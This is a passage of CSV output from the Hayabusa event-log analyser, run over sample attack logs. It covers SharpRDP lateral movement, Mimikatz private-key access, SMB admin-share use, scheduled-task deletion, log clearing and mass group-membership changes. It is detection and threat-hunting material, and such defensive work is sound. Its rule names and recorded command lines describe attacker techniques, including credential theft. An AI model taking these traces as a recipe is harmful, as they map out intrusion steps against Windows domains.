Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip : Path: C:\Windows\System32\rdpclip.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe"" : Path: \\tsclient\c\temp\stack\a.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 06:38:17.351 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\smbservice timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx -2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx -2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx -2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx -2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct : SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx -2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx -2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx -2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx -2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx -2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09 : Subject user: lambda-user : Subject domain: 